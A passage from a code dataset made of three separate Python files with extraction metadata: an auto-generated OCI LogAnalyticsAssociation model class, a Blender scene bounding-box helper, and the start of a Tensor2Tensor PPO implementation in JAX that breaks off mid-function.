:param agent_entity_name:
The value to assign to the agent_entity_name property of this LogAnalyticsAssociation.
:type agent_entity_name: str
:param entity_type_display_name:
The value to assign to the entity_type_display_name property of this LogAnalyticsAssociation.
:type entity_type_display_name: str
:param log_group_id:
The value to assign to the log_group_id property of this LogAnalyticsAssociation.
:type log_group_id: str
:param log_group_name:
The value to assign to the log_group_name property of this LogAnalyticsAssociation.
:type log_group_name: str
:param log_group_compartment:
The value to assign to the log_group_compartment property of this LogAnalyticsAssociation.
:type log_group_compartment: str
"""
self.swagger_types = {
'failure_message': 'str',
'agent_id': 'str',
'time_last_attempted': 'datetime',
'retry_count': 'int',
'source_name': 'str',
'source_display_name': 'str',
'source_type_name': 'str',
'life_cycle_state': 'str',
'entity_id': 'str',
'entity_name': 'str',
'entity_type_name': 'str',
'host': 'str',
'agent_entity_name': 'str',
'entity_type_display_name': 'str',
'log_group_id': 'str',
'log_group_name': 'str',
'log_group_compartment': 'str'
}
self.attribute_map = {
'failure_message': 'failureMessage',
'agent_id': 'agentId',
'time_last_attempted': 'timeLastAttempted',
'retry_count': 'retryCount',
'source_name': 'sourceName',
'source_display_name': 'sourceDisplayName',
'source_type_name': 'sourceTypeName',
'life_cycle_state': 'lifeCycleState',
'entity_id': 'entityId',
'entity_name': 'entityName',
'entity_type_name': 'entityTypeName',
'host': 'host',
'agent_entity_name': 'agentEntityName',
'entity_type_display_name': 'entityTypeDisplayName',
'log_group_id': 'logGroupId',
'log_group_name': 'logGroupName',
'log_group_compartment': 'logGroupCompartment'
}
self._failure_message = None
self._agent_id = None
self._time_last_attempted = None
self._retry_count = None
self._source_name = None
self._source_display_name = None
self._source_type_name = None
self._life_cycle_state = None
self._entity_id = None
self._entity_name = None
self._entity_type_name = None
self._host = None
self._agent_entity_name = None
self._entity_type_display_name = None
self._log_group_id = None
self._log_group_name = None
self._log_group_compartment = None
@property
def failure_message(self):
"""
Gets the failure_message of this LogAnalyticsAssociation.
The failure message.
:return: The failure_message of this LogAnalyticsAssociation.
:rtype: str
"""
return self._failure_message
@failure_message.setter
def failure_message(self, failure_message):
"""
Sets the failure_message of this LogAnalyticsAssociation.
The failure message.
:param failure_message: The failure_message of this LogAnalyticsAssociation.
:type: str
"""
self._failure_message = failure_message
@property
def agent_id(self):
"""
Gets the agent_id of this LogAnalyticsAssociation.
The agent unique identifier.
:return: The agent_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._agent_id
@agent_id.setter
def agent_id(self, agent_id):
"""
Sets the agent_id of this LogAnalyticsAssociation.
The agent unique identifier.
:param agent_id: The agent_id of this LogAnalyticsAssociation.
:type: str
"""
self._agent_id = agent_id
@property
def time_last_attempted(self):
"""
Gets the time_last_attempted of this LogAnalyticsAssociation.
The last attempt date.
:return: The time_last_attempted of this LogAnalyticsAssociation.
:rtype: datetime
"""
return self._time_last_attempted
@time_last_attempted.setter
def time_last_attempted(self, time_last_attempted):
"""
Sets the time_last_attempted of this LogAnalyticsAssociation.
The last attempt date.
:param time_last_attempted: The time_last_attempted of this LogAnalyticsAssociation.
:type: datetime
"""
self._time_last_attempted = time_last_attempted
@property
def retry_count(self):
"""
Gets the retry_count of this LogAnalyticsAssociation.
The number of times the association will be attempted
before failing.
:return: The retry_count of this LogAnalyticsAssociation.
:rtype: int
"""
return self._retry_count
@retry_count.setter
def retry_count(self, retry_count):
"""
Sets the retry_count of this LogAnalyticsAssociation.
The number of times the association will be attempted
before failing.
:param retry_count: The retry_count of this LogAnalyticsAssociation.
:type: int
"""
self._retry_count = retry_count
@property
def source_name(self):
"""
Gets the source_name of this LogAnalyticsAssociation.
The source name.
:return: The source_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_name
@source_name.setter
def source_name(self, source_name):
"""
Sets the source_name of this LogAnalyticsAssociation.
The source name.
:param source_name: The source_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_name = source_name
@property
def source_display_name(self):
"""
Gets the source_display_name of this LogAnalyticsAssociation.
The source display name.
:return: The source_display_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_display_name
@source_display_name.setter
def source_display_name(self, source_display_name):
"""
Sets the source_display_name of this LogAnalyticsAssociation.
The source display name.
:param source_display_name: The source_display_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_display_name = source_display_name
@property
def source_type_name(self):
"""
Gets the source_type_name of this LogAnalyticsAssociation.
The source type internal name.
:return: The source_type_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_type_name
@source_type_name.setter
def source_type_name(self, source_type_name):
"""
Sets the source_type_name of this LogAnalyticsAssociation.
The source type internal name.
:param source_type_name: The source_type_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_type_name = source_type_name
@property
def life_cycle_state(self):
"""
Gets the life_cycle_state of this LogAnalyticsAssociation.
The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED
or FAILED.
Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The life_cycle_state of this LogAnalyticsAssociation.
:rtype: str
"""
return self._life_cycle_state
@life_cycle_state.setter
def life_cycle_state(self, life_cycle_state):
"""
Sets the life_cycle_state of this LogAnalyticsAssociation.
The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED
or FAILED.
:param life_cycle_state: The life_cycle_state of this LogAnalyticsAssociation.
:type: str
"""
allowed_values = ["ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED"]
if not value_allowed_none_or_none_sentinel(life_cycle_state, allowed_values):
life_cycle_state = 'UNKNOWN_ENUM_VALUE'
self._life_cycle_state = life_cycle_state
@property
def entity_id(self):
"""
Gets the entity_id of this LogAnalyticsAssociation.
The entity unique identifier.
:return: The entity_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""
Sets the entity_id of this LogAnalyticsAssociation.
The entity unique identifier.
:param entity_id: The entity_id of this LogAnalyticsAssociation.
:type: str
"""
self._entity_id = entity_id
@property
def entity_name(self):
"""
Gets the entity_name of this LogAnalyticsAssociation.
The entity name.
:return: The entity_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_name
@entity_name.setter
def entity_name(self, entity_name):
"""
Sets the entity_name of this LogAnalyticsAssociation.
The entity name.
:param entity_name: The entity_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_name = entity_name
@property
def entity_type_name(self):
"""
Gets the entity_type_name of this LogAnalyticsAssociation.
The entity type internal name.
:return: The entity_type_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_type_name
@entity_type_name.setter
def entity_type_name(self, entity_type_name):
"""
Sets the entity_type_name of this LogAnalyticsAssociation.
The entity type internal name.
:param entity_type_name: The entity_type_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_type_name = entity_type_name
@property
def host(self):
"""
Gets the host of this LogAnalyticsAssociation.
The host name.
:return: The host of this LogAnalyticsAssociation.
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""
Sets the host of this LogAnalyticsAssociation.
The host name.
:param host: The host of this LogAnalyticsAssociation.
:type: str
"""
self._host = host
@property
def agent_entity_name(self):
"""
Gets the agent_entity_name of this LogAnalyticsAssociation.
The name of the entity which contains the agent.
:return: The agent_entity_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._agent_entity_name
@agent_entity_name.setter
def agent_entity_name(self, agent_entity_name):
"""
Sets the agent_entity_name of this LogAnalyticsAssociation.
The name of the entity which contains the agent.
:param agent_entity_name: The agent_entity_name of this LogAnalyticsAssociation.
:type: str
"""
self._agent_entity_name = agent_entity_name
@property
def entity_type_display_name(self):
"""
Gets the entity_type_display_name of this LogAnalyticsAssociation.
The entity type display name.
:return: The entity_type_display_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_type_display_name
@entity_type_display_name.setter
def entity_type_display_name(self, entity_type_display_name):
"""
Sets the entity_type_display_name of this LogAnalyticsAssociation.
The entity type display name.
:param entity_type_display_name: The entity_type_display_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_type_display_name = entity_type_display_name
@property
def log_group_id(self):
"""
Gets the log_group_id of this LogAnalyticsAssociation.
The log group unique identifier.
:return: The log_group_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""
Sets the log_group_id of this LogAnalyticsAssociation.
The log group unique identifier.
:param log_group_id: The log_group_id of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_group_name(self):
"""
Gets the log_group_name of this LogAnalyticsAssociation.
The log group name.
:return: The log_group_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_name
@log_group_name.setter
def log_group_name(self, log_group_name):
"""
Sets the log_group_name of this LogAnalyticsAssociation.
The log group name.
:param log_group_name: The log_group_name of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_name = log_group_name
@property
def log_group_compartment(self):
"""
Gets the log_group_compartment of this LogAnalyticsAssociation.
The log group compartment.
:return: The log_group_compartment of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_compartment
@log_group_compartment.setter
def log_group_compartment(self, log_group_compartment):
"""
Sets the log_group_compartment of this LogAnalyticsAssociation.
The log group compartment.
:param log_group_compartment: The log_group_compartment of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_compartment = log_group_compartment
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| [
"oci.util.formatted_flat_dict",
"oci.util.value_allowed_none_or_none_sentinel"
]
| [((18491, 18516), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (18510, 18516), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((12440, 12509), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['life_cycle_state', 'allowed_values'], {}), '(life_cycle_state, allowed_values)\n', (12475, 12509), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')] |
import logging
from typing import Tuple
import bpy
from mathutils import Vector
from .object import get_objs
logger = logging.getLogger(__name__)
class SceneBoundingBox():
"""Scene bounding box, build a bounding box that includes all objects except the excluded ones."""
################################################################################################
# Properties
#
# ==============================================================================================
@property
def width(self):
"""Scene's bounding box width."""
return self.x_max - self.x_min
# ==============================================================================================
@property
def depth(self):
"""Scene's bounding box depth."""
return self.y_max - self.y_min
# ==============================================================================================
@property
def height(self):
"""Scene's bounding box height."""
return self.z_max - self.z_min
# ==============================================================================================
@property
def floor_center(self):
"""Scene's bounding center on lower bbox plane."""
return Vector((self.center[0], self.center[1], self.z_min))
################################################################################################
# Constructor
#
# ==============================================================================================
def __init__(self, scene: bpy.types.Scene,
exclude_collections: Tuple[str] = ("SfM_Environment", "SfM_Reconstructions")):
self.scene = scene
self.exclude_collections = exclude_collections
#
self.center = Vector() # type: Vector
self.x_min = float("inf") # type: float
self.x_max = float("-inf") # type: float
self.y_min = float("inf") # type: float
self.y_max = float("-inf") # type: float
self.z_min = float("inf") # type: float
self.z_max = float("-inf") # type: float
#
self.compute()
################################################################################################
# Methods
#
# ==============================================================================================
def compute(self):
"""Compute the scene bounding box values."""
objs = get_objs(self.scene, exclude_collections=self.exclude_collections, mesh_only=True)
logger.debug("Found %i objects in scene %s", len(objs), self.scene.name)
for obj in objs:
obb = obj.bound_box
for i in range(8):
p = obj.matrix_world @ Vector(obb[i])
self.x_min = min(self.x_min, p[0])
self.x_max = max(self.x_max, p[0])
self.y_min = min(self.y_min, p[1])
self.y_max = max(self.y_max, p[1])
self.z_min = min(self.z_min, p[2])
self.z_max = max(self.z_max, p[2])
if objs:
self.center = Vector(((self.x_max + self.x_min) / 2,
(self.y_max + self.y_min) / 2,
(self.z_max + self.z_min) / 2))
logger.debug(str(self))
# ==============================================================================================
def get_min_vector(self):
"""Get minimum axis."""
return Vector((self.x_min, self.y_min, self.z_min))
# ==============================================================================================
def get_max_vector(self):
"""Get maximum axis."""
return Vector((self.x_max, self.y_max, self.z_max))
################################################################################################
# Builtin methods
#
# ==============================================================================================
def __str__(self):
return "Scene bbox values: X=({:.3f}, {:.3f}), Y=({:.3f}, {:.3f}), Z=({:.3f}, {:.3f}), Center={}".format(
self.x_min, self.x_max, self.y_min, self.y_max, self.z_min, self.z_max, self.center)
| [
"logging.getLogger",
"mathutils.Vector"
]
| [((122, 149), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (139, 149), False, 'import logging\n'), ((1280, 1332), 'mathutils.Vector', 'Vector', (['(self.center[0], self.center[1], self.z_min)'], {}), '((self.center[0], self.center[1], self.z_min))\n', (1286, 1332), False, 'from mathutils import Vector\n'), ((1818, 1826), 'mathutils.Vector', 'Vector', ([], {}), '()\n', (1824, 1826), False, 'from mathutils import Vector\n'), ((3538, 3582), 'mathutils.Vector', 'Vector', (['(self.x_min, self.y_min, self.z_min)'], {}), '((self.x_min, self.y_min, self.z_min))\n', (3544, 3582), False, 'from mathutils import Vector\n'), ((3762, 3806), 'mathutils.Vector', 'Vector', (['(self.x_max, self.y_max, self.z_max)'], {}), '((self.x_max, self.y_max, self.z_max))\n', (3768, 3806), False, 'from mathutils import Vector\n'), ((3157, 3263), 'mathutils.Vector', 'Vector', (['((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self.z_max +\n self.z_min) / 2)'], {}), '(((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self\n .z_max + self.z_min) / 2))\n', (3163, 3263), False, 'from mathutils import Vector\n'), ((2793, 2807), 'mathutils.Vector', 'Vector', (['obb[i]'], {}), '(obb[i])\n', (2799, 2807), False, 'from mathutils import Vector\n')] |
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PPO in JAX.
Notation:
B, scalar - batch size
T, scalar - number of time-steps in a trajectory, or the value of the padded
time-step dimension.
OBS, tuple - shape of a singular observation from the environment.
Ex: For CartPole-v0 this is (4,) and Pong-v0 it's (210, 160, 3)
A, scalar - Number of actions, assuming a discrete space.
Policy and Value function signatures:
Policy Function :: [B, T] + OBS -> [B, T, A]
Value Function :: [B, T] + OBS -> [B, T, 1]
Policy and Value Function :: [B, T] + OBS -> ([B, T, A], [B, T, 1])
i.e. the policy net should take a batch of *trajectories* and at each time-step
in each batch deliver a probability distribution over actions.
NOTE: It doesn't return logits, rather the expectation is that it returns
log-probabilities instead.
NOTE: The policy and value functions need to take care to not take into account
future time-steps while deciding the actions (or value) for the current
time-step.
Policy and Value Function produces a tuple of the expected output of a policy
function and a value function.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import pickle
import time
from absl import logging
import gym
from jax import grad
from jax import jit
from jax import lax
from jax import numpy as np
from jax import random as jax_random
import numpy as onp
from tensor2tensor.envs import env_problem
from tensor2tensor.envs import env_problem_utils
from tensor2tensor.trax import jaxboard
from tensor2tensor.trax import layers
from tensor2tensor.trax import optimizers as trax_opt
from tensor2tensor.trax import trax
from tensorflow.io import gfile
DEBUG_LOGGING = False
GAMMA = 0.99
LAMBDA = 0.95
EPSILON = 0.1
EPOCHS = 50 # 100
NUM_OPTIMIZER_STEPS = 100
PRINT_EVERY_OPTIMIZER_STEP = 20
BATCH_TRAJECTORIES = 32
def policy_and_value_net(rng_key,
batch_observations_shape,
num_actions,
bottom_layers_fn=None,
two_towers=True):
"""A policy and value net function."""
# Layers.
# Now, with the current logits, one head computes action probabilities and the
# other computes the value function.
# NOTE: The LogSoftmax instead of the Softmax because of numerical stability.
net = None
if not two_towers:
tower = [] if bottom_layers_fn is None else bottom_layers_fn()
tower.extend([
layers.Branch(
layers.Serial(layers.Dense(num_actions), layers.LogSoftmax()),
layers.Dense(1))
])
net = layers.Serial(*tower)
else:
tower1 = [] if bottom_layers_fn is None else bottom_layers_fn()
tower2 = [] if bottom_layers_fn is None else bottom_layers_fn()
tower1.extend([layers.Dense(num_actions), layers.LogSoftmax()])
tower2.extend([layers.Dense(1)])
net = layers.Branch(
layers.Serial(*tower1),
layers.Serial(*tower2),
)
assert net
return net.initialize(batch_observations_shape, rng_key), net
def optimizer_fun(net_params, step_size=1e-3):
opt = trax_opt.Adam(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08)
opt_init = lambda x: (x, opt.tree_init(x))
opt_update = lambda i, g, s: opt.tree_update(i, g, s[0], s[1])
get_params = lambda x: x[0]
opt_state = opt_init(net_params)
return opt_state, opt_update, get_params
# Should this be collect 'n' trajectories, or
# Run the env for 'n' steps and take completed trajectories, or
# Any other option?
# TODO(afrozm): Replace this with EnvProblem?
def collect_trajectories(env,
policy_fun,
num_trajectories=1,
policy=env_problem_utils.CATEGORICAL_SAMPLING,
max_timestep=None,
boundary=20,
epsilon=0.1,
reset=True,
rng=None):
"""Collect trajectories with the given policy net and behaviour.
Args:
env: A gym env interface, for now this is not-batched.
policy_fun: observations(B,T+1) -> log-probabs(B,T+1, A) callable.
num_trajectories: int, number of trajectories.
policy: string, "greedy", "epsilon-greedy", or "categorical-sampling" i.e.
how to use the policy_fun to return an action.
max_timestep: int or None, the index of the maximum time-step at which we
return the trajectory, None for ending a trajectory only when env returns
done.
boundary: int, boundary for padding, used in EnvProblem envs.
epsilon: float, the epsilon for `epsilon-greedy` policy.
reset: bool, true if we want to reset the envs. The envs are also reset if
max_max_timestep is None or < 0
rng: jax rng, splittable.
Returns:
A tuple (trajectory, number of trajectories that are done)
trajectory: list of (observation, action, reward) tuples, where each element
`i` is a tuple of numpy arrays with shapes as follows:
observation[i] = (B, T_i + 1)
action[i] = (B, T_i)
reward[i] = (B, T_i)
"""
assert isinstance(env, env_problem.EnvProblem)
# This is an env_problem, run its collect function.
return env_problem_utils.play_env_problem_with_policy(
env,
policy_fun,
num_trajectories=num_trajectories,
max_timestep=max_timestep,
boundary=boundary,
policy_sampling=policy,
eps=epsilon,
reset=reset,
rng=rng)
# This function can probably be simplified, ask how?
# Can we do something much simpler than lax.pad, maybe np.pad?
# Others?
def get_padding_value(dtype):
"""Returns the padding value given a dtype."""
padding_value = None
if dtype == np.uint8:
padding_value = np.uint8(0)
elif dtype == np.uint16:
padding_value = np.uint16(0)
elif dtype == np.float32 or dtype == np.float64:
padding_value = 0.0
else:
padding_value = 0
assert padding_value is not None
return padding_value
# TODO(afrozm): Use np.pad instead and make jittable?
def pad_trajectories(trajectories, boundary=20):
"""Pad trajectories to a bucket length that is a multiple of boundary.
Args:
trajectories: list[(observation, actions, rewards)], where each observation
is shaped (t+1,) + OBS and actions & rewards are shaped (t,), with the
length of the list being B (batch size).
boundary: int, bucket length, the actions and rewards are padded to integer
multiples of boundary.
Returns:
tuple: (padding lengths, reward_mask, padded_observations, padded_actions,
padded_rewards) where padded_observations is shaped (B, T+1) + OBS and
padded_actions, padded_rewards & reward_mask are shaped (B, T).
Where T is max(t) rounded up to an integer multiple of boundary.
padded_length is how much padding we've added and
reward_mask is 1s for actual rewards and 0s for the padding.
"""
# Let's compute max(t) over all trajectories.
t_max = max(r.shape[0] for (_, _, r) in trajectories)
# t_max is rounded to the next multiple of `boundary`
boundary = int(boundary)
bucket_length = boundary * int(np.ceil(float(t_max) / boundary))
# So all obs will be padded to t_max + 1 and actions and rewards to t_max.
padded_observations = []
padded_actions = []
padded_rewards = []
padded_lengths = []
reward_masks = []
for (o, a, r) in trajectories:
# Determine the amount to pad, this holds true for obs, actions and rewards.
num_to_pad = bucket_length + 1 - o.shape[0]
padded_lengths.append(num_to_pad)
if num_to_pad == 0:
padded_observations.append(o)
padded_actions.append(a)
padded_rewards.append(r)
reward_masks.append(onp.ones_like(r, dtype=np.int32))
continue
# First pad observations.
padding_config = [(0, num_to_pad, 0)]
for _ in range(o.ndim - 1):
padding_config.append((0, 0, 0))
padding_config = tuple(padding_config)
padding_value = get_padding_value(o.dtype)
action_padding_value = get_padding_value(a.dtype)
reward_padding_value = get_padding_value(r.dtype)
padded_obs = lax.pad(o, padding_value, padding_config)
padded_observations.append(padded_obs)
# Now pad actions and rewards.
assert a.ndim == 1 and r.ndim == 1
padding_config = ((0, num_to_pad, 0),)
padded_action = lax.pad(a, action_padding_value, padding_config)
padded_actions.append(padded_action)
padded_reward = lax.pad(r, reward_padding_value, padding_config)
padded_rewards.append(padded_reward)
# Also create the mask to use later.
reward_mask = onp.ones_like(r, dtype=np.int32)
reward_masks.append(lax.pad(reward_mask, 0, padding_config))
return padded_lengths, np.stack(reward_masks), np.stack(
padded_observations), np.stack(padded_actions), np.stack(padded_rewards)
# TODO(afrozm): JAX-ify this, this is too slow for pong.
def rewards_to_go(rewards, mask, gamma=0.99):
r"""Computes rewards to go.
Reward to go is defined as follows, the discounted reward that we have to
yet collect, going forward from this point, i.e.:
r2g_t = \sum_{l=0}^{\infty} (\gamma^{l} * reward_{t+l})
Args:
rewards: np.ndarray of shape (B, T) of rewards.
mask: np.ndarray of shape (B, T) of mask for the rewards.
gamma: float, discount factor.
Returns:
rewards to go, np.ndarray of shape (B, T).
"""
B, T = rewards.shape # pylint: disable=invalid-name,unused-variable
masked_rewards = rewards * mask # (B, T)
# We use the following recurrence relation, derived from the equation above:
#
# r2g[t+1] = (r2g[t] - r[t]) / gamma
#
# This means we'll need to calculate r2g[0] first and then r2g[1] and so on ..
#
# **However** this leads to overflows for long sequences: r2g[t] - r[t] > 0
# and gamma < 1.0, so the division keeps increasing.
#
# So we just run the recurrence in reverse, i.e.
#
# r2g[t] = r[t] + (gamma*r2g[t+1])
#
# This is much better, but might have lost updates since the (small) rewards
# at earlier time-steps may get added to a (very?) large sum.
# Compute r2g_{T-1} at the start and then compute backwards in time.
r2gs = [masked_rewards[:, -1]]
# Go from T-2 down to 0.
for t in reversed(range(T - 1)):
r2gs.append(masked_rewards[:, t] + (gamma * r2gs[-1]))
# The list should have length T.
assert T == len(r2gs)
# First we stack them in the correct way to make it (B, T), but these are
# still from newest (T-1) to oldest (0), so then we flip it on time axis.
return np.flip(np.stack(r2gs, axis=1), axis=1)
@jit
def value_loss_given_predictions(value_prediction,
rewards,
reward_mask,
gamma=0.99,
epsilon=0.2,
value_prediction_old=None):
"""Computes the value loss given the prediction of the value function.
Args:
value_prediction: np.ndarray of shape (B, T+1, 1)
rewards: np.ndarray of shape (B, T) of rewards.
reward_mask: np.ndarray of shape (B, T), the mask over rewards.
gamma: float, discount factor.
epsilon: float, clip-fraction, used if value_value_prediction_old isn't None
value_prediction_old: np.ndarray of shape (B, T+1, 1) of value predictions
using the old parameters. If provided, we incorporate this in the loss as
well. This is from the OpenAI baselines implementation.
Returns:
The average L2 value loss, averaged over instances where reward_mask is 1.
"""
B, T = rewards.shape # pylint: disable=invalid-name
assert (B, T) == reward_mask.shape
assert (B, T + 1, 1) == value_prediction.shape
value_prediction = np.squeeze(value_prediction, axis=2) # (B, T+1)
value_prediction = value_prediction[:, :-1] * reward_mask # (B, T)
r2g = rewards_to_go(rewards, reward_mask, gamma=gamma) # (B, T)
loss = (value_prediction - r2g)**2
# From the baselines implementation.
if value_prediction_old is not None:
value_prediction_old = np.squeeze(value_prediction_old, axis=2) # (B, T+1)
value_prediction_old = value_prediction_old[:, :-1] * reward_mask # (B, T)
v_clipped = value_prediction_old + np.clip(
value_prediction - value_prediction_old, -epsilon, epsilon)
v_clipped_loss = (v_clipped - r2g)**2
loss = np.maximum(v_clipped_loss, loss)
# Take an average on only the points where mask != 0.
return np.sum(loss) / np.sum(reward_mask)
# TODO(afrozm): JAX-ify this, this is too slow for pong.
def deltas(predicted_values, rewards, mask, gamma=0.99):
r"""Computes TD-residuals from V(s) and rewards.
Where a `delta`, i.e. a td-residual is defined as:
delta_{b,t} = r_{b,t} + \gamma * v_{b,t+1} - v_{b,t}.
Args:
predicted_values: ndarray of shape (B, T+1). NOTE: Expects axis 2 was
squeezed. These represent V(s_bt) for b < B and t < T+1
rewards: ndarray of shape (B, T) of rewards.
mask: ndarray of shape (B, T) of mask for rewards.
gamma: float, discount factor.
Returns:
ndarray of shape (B, T) of one-step TD-residuals.
"""
# `d`s are basically one-step TD residuals.
d = []
_, T = rewards.shape # pylint: disable=invalid-name
for t in range(T):
d.append(rewards[:, t] + (gamma * predicted_values[:, t + 1]) -
predicted_values[:, t])
return np.array(d).T * mask
def gae_advantages(td_deltas, mask, lambda_=0.95, gamma=0.99):
r"""Computes the GAE advantages given the one step TD-residuals.
The formula for a GAE advantage estimator is as follows:
A_{bt} = \sum_{l=0}^{\infty}(\gamma * \lambda)^{l}(\delta_{b,t+l}).
Internally we just call rewards_to_go, since it is the same computation.
Args:
td_deltas: np.ndarray of shape (B, T) of one step TD-residuals.
mask: np.ndarray of shape (B, T) of mask for the residuals. It maybe the
case that the `td_deltas` are already masked correctly since they are
produced by `deltas(...)`
lambda_: float, lambda parameter for GAE estimators.
gamma: float, lambda parameter for GAE estimators.
Returns:
GAE advantage estimates.
"""
return rewards_to_go(td_deltas, mask, lambda_ * gamma)
def chosen_probabs(probab_observations, actions):
"""Picks out the probabilities of the actions along batch and time-steps.
Args:
probab_observations: ndarray of shape `[B, T+1, A]`, where
probab_observations[b, t, i] contains the log-probability of action = i at
the t^th time-step in the b^th trajectory.
actions: ndarray of shape `[B, T]`, with each entry in [0, A) denoting which
action was chosen in the b^th trajectory's t^th time-step.
Returns:
`[B, T]` ndarray with the log-probabilities of the chosen actions.
"""
B, T = actions.shape # pylint: disable=invalid-name
assert (B, T + 1) == probab_observations.shape[:2]
return probab_observations[np.arange(B)[:, None], np.arange(T), actions]
def compute_probab_ratios(p_new, p_old, actions, reward_mask):
"""Computes the probability ratios for each time-step in a trajectory.
Args:
p_new: ndarray of shape [B, T+1, A] of the log-probabilities that the policy
network assigns to all the actions at each time-step in each batch using
the old parameters.
p_old: ndarray of shape [B, T+1, A], same as above, but using old policy
network parameters.
actions: ndarray of shape [B, T] where each element is from [0, A).
reward_mask: ndarray of shape [B, T] masking over probabilities.
Returns:
probab_ratios: ndarray of shape [B, T], where
probab_ratios_{b,t} = p_new_{b,t,action_{b,t}} / p_old_{b,t,action_{b,t}}
"""
B, T = actions.shape # pylint: disable=invalid-name
assert (B, T + 1) == p_old.shape[:2]
assert (B, T + 1) == p_new.shape[:2]
logp_old = chosen_probabs(p_old, actions)
logp_new = chosen_probabs(p_new, actions)
assert (B, T) == logp_old.shape
assert (B, T) == logp_new.shape
# Since these are log-probabilities, we just subtract them.
probab_ratios = np.exp(logp_new - logp_old) * reward_mask
assert (B, T) == probab_ratios.shape
return probab_ratios
def clipped_probab_ratios(probab_ratios, epsilon=0.2):
return np.clip(probab_ratios, 1 - epsilon, 1 + epsilon)
def clipped_objective(probab_ratios, advantages, reward_mask, epsilon=0.2):
return np.minimum(
probab_ratios * advantages,
clipped_probab_ratios(probab_ratios, epsilon=epsilon) *
advantages) * reward_mask
@jit
def ppo_loss_given_predictions(log_probab_actions_new,
log_probab_actions_old,
value_predictions_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
lambda_=0.95,
epsilon=0.2):
"""PPO objective, with an eventual minus sign, given predictions."""
B, T = padded_rewards.shape # pylint: disable=invalid-name
assert (B, T) == padded_actions.shape
assert (B, T) == reward_mask.shape
_, _, A = log_probab_actions_old.shape # pylint: disable=invalid-name
assert (B, T + 1, 1) == value_predictions_old.shape
assert (B, T + 1, A) == log_probab_actions_old.shape
assert (B, T + 1, A) == log_probab_actions_new.shape
# (B, T)
td_deltas = deltas(
np.squeeze(value_predictions_old, axis=2), # (B, T+1)
padded_rewards,
reward_mask,
gamma=gamma)
# (B, T)
advantages = gae_advantages(
td_deltas, reward_mask, lambda_=lambda_, gamma=gamma)
# Normalize the advantages.
advantages = (advantages - np.mean(advantages)) / np.std(advantages)
# (B, T)
ratios = compute_probab_ratios(log_probab_actions_new, log_probab_actions_old,
padded_actions, reward_mask)
assert (B, T) == ratios.shape
# (B, T)
objective = clipped_objective(
ratios, advantages, reward_mask, epsilon=epsilon)
assert (B, T) == objective.shape
# ()
average_objective = np.sum(objective) / np.sum(reward_mask)
# Loss is negative objective.
return -average_objective
@jit
def combined_loss_given_predictions(log_probab_actions_new,
log_probab_actions_old,
value_prediction_new,
value_prediction_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
lambda_=0.95,
epsilon=0.2,
c1=1.0,
c2=0.01):
"""Computes the combined (clipped loss + value loss) given predictions."""
loss_value = value_loss_given_predictions(
value_prediction_new,
padded_rewards,
reward_mask,
gamma=gamma,
value_prediction_old=value_prediction_old,
epsilon=epsilon)
loss_ppo = ppo_loss_given_predictions(
log_probab_actions_new,
log_probab_actions_old,
value_prediction_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon)
entropy_bonus = masked_entropy(log_probab_actions_new, reward_mask)
return (loss_ppo + (c1 * loss_value) - (c2 * entropy_bonus), loss_ppo,
loss_value, entropy_bonus)
@functools.partial(jit, static_argnums=(3,))
def combined_loss(new_params,
log_probab_actions_old,
value_predictions_old,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
